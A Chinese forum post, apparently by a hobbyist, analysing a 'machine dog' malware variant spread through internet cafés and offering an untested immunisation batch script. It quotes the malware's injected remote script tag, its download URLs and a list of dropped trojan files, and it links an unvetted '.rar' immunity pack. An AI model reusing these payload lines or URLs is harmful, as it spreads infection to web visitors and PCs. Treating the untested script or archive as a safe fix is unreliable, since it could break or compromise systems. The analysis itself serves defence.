哎，这东西无敌了，最近在网吧比较流行

昨晚去朋友网吧，抓了一个上来，看了下，应该是个变种

比较恶心的是，被修改的Userinit文件版本等信息都在，汗

还加入防杀的技术```````

一开始是个被感染的Userinit.exe（23,552 字节）的样本

运行，释放usrinit.exe（少了个'e'）于%systemroot%\system32下（11,124 字节）

注意，这个才是正常的，但是被做了处理

加了WinUpack的壳，所以数字签字丢了

不是主角，先54，继续....

然后那个Userinit.exe常驻进程，每隔1.5秒会访问网络124.74.201.19（上海市 电信）

所以可能会出现中标的机子一连接网线就中毒的情况

如果网路顺畅，就下木马，首先下载这个：

h**p://www.868wg.com/1/1/update.exe

基本特征：

1、尝试加载pcibus.sys（这个可能是重点）、usb32k.sys和pcidisk.sys，后面2个其实是PE文件。

2、启动%systemroot%\system32\Svchost.exe空壳进程，并把自己代码注入其中。

这时候被操控的Svchost.exe在进程中就等同于病毒。

这点比较狠毒，因为这个是系统文件，无法对其做权限设置，那么以前免疫机器狗的方法通通无效！！

3、查找硬盘htm/.html/.asp/.jsp/.php文件，插入一段代码：

<script language=javascript src=h**p://www.868wg.com/1/1/qq.js></script>

失效了好像``

4、连接网络，下载：

http://www.868wg.com/1/1/elf_listo.txt

获得木马下载列表，并下载到硬盘，命名为：

000092EC   004092EC      0   c:\Program Files\conimeu.exe
0000930C   0040930C      0   c:\Program Files\conimet.exe
0000932C   0040932C      0   c:\Program Files\conimes.exe
0000934C   0040934C      0   c:\Program Files\conimer.exe
0000936C   0040936C      0   c:\Program Files\conimeq.exe
0000938C   0040938C      0   c:\Program Files\conimep.exe
000093AC   004093AC      0   c:\Program Files\conimeo.exe
000093CC   004093CC      0   c:\Program Files\conimen.exe
000093EC   004093EC      0   c:\Program Files\conimem.exe
0000940C   0040940C      0   c:\Program Files\conimel.exe
0000942C   0040942C      0   c:\Program Files\conimek.exe
0000944C   0040944C      0   c:\Program Files\conimej.exe
0000946C   0040946C      0   c:\Program Files\conimei.exe
0000948C   0040948C      0   c:\Program Files\conimeh.exe
000094AC   004094AC      0   c:\Program Files\conimef.exe
000094CC   004094CC      0   c:\Program Files\conimee.exe
000094EC   004094EC      0   c:\Program Files\conimed.exe
0000950C   0040950C      0   c:\Program Files\conimec.exe
0000952C   0040952C      0   c:\Program Files\conimeb.exe
0000954C   0040954C      0   c:\Program Files\conimea.exe
0000956C   0040956C      0   c:\Program Files\conime9.exe
0000958C   0040958C      0   c:\Program Files\conime8.exe
000095AC   004095AC      0   c:\Program Files\conime7.exe
000095CC   004095CC      0   c:\Program Files\conime6.exe
000095EC   004095EC      0   c:\Program Files\conime5.exe
0000960C   0040960C      0   c:\Program Files\conime4.exe
0000962C   0040962C      0   c:\Program Files\conime3.exe
0000964C   0040964C      0   c:\Program Files\conime2.exe
0000966C   0040966C      0   c:\Program Files\conime1.exe
0000968C   0040968C      0   c:\Program Files\conime0.exe

里面有很多连接失效了，搞不懂

我就看了后面几个（已失效），我记忆中机器狗和ARP病毒都是放在后面的连接...

5、可能会对硬盘中的EXE和COM文件做修改（跳过系统盘），但不是感染

用意还不知道，知道的请告诉我

6、病毒刚执行时，会访问pcibus.sys（应该是这个吧，不记得了）。

并把它的一些文件信息保存在：System32\utility.hiv

如果返回的信息无效，那可能会被判断为pcibus.sys是免疫文件夹或无效文件

这时候它会重新写入，并加载。

7、可能会查找一些窗口，并关闭。

具体是什么还不知道，壳没完全脱干净``

8、尝试访问磁盘底层，可能会因此穿还原（未验证）

我是看到那个病毒文件，有3个PE头，内有一驱动

具体是啥东西还不清楚，但是会对磁盘底层进行操作...

另外该病毒可能会利用MS06-040提权，完全控制该系统。

大概就是这些，因为实机，磁盘访问操作我阻止

至于这个东东能不能穿还原还不能肯定

但是不难看出，机器狗这次升级，可能会使以后的免疫工作更难做

..............

对于个人PC办法有很多，但是网吧就不好弄了...

只能暂时用cacls把pcibus.sys、usb32k.sys、pcidisk.sys暂时免疫下

如果可以的话，把注册表的驱动整个项，设置为只读...禁止加载驱动！

把下面复制到文本改成.bat，应该可以免疫：

md %systemroot%\system32\drivers\pcihdd.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\system32\drivers\pcibus.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\system32\drivers\pcidisk.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\system32\drivers\usb32k.sys\免疫文件夹By孤独更可靠...\
md %systemroot%\System32\Com\comrepl32.exe\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime5.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime4.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime3.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime2.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime1.exe"\免疫文件夹By孤独更可靠...\
md "C:\Program Files\conime0.exe"\免疫文件夹By孤独更可靠...\
cacls %systemroot%\System32\Com\comrepl32.exe /e /p everyone:n
cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n
cacls %systemroot%\system32\drivers\pcibus.sys /e /p everyone:n
cacls %systemroot%\system32\drivers\pcidisk.sys /e /p everyone:n
cacls %systemroot%\system32\drivers\usb32k.sys /e /p everyone:n
cacls %systemroot%\system32\userinit.exe /e /p everyone:r

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

Options\comrepl32.exe" /v debugger /t reg_sz /d Explorer.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

Options\conime0.exe" /v debugger /t reg_sz /d Explorer.exe /f

谁去测试下，我没测试。。。

免疫包，我上传了，有需要的去下````：

http://www.kingzoo.com/tools/孤独更可靠/病毒免疫.rar

对了，至于那个Userinit文件版本，也不见得有什么了不起

雕虫小技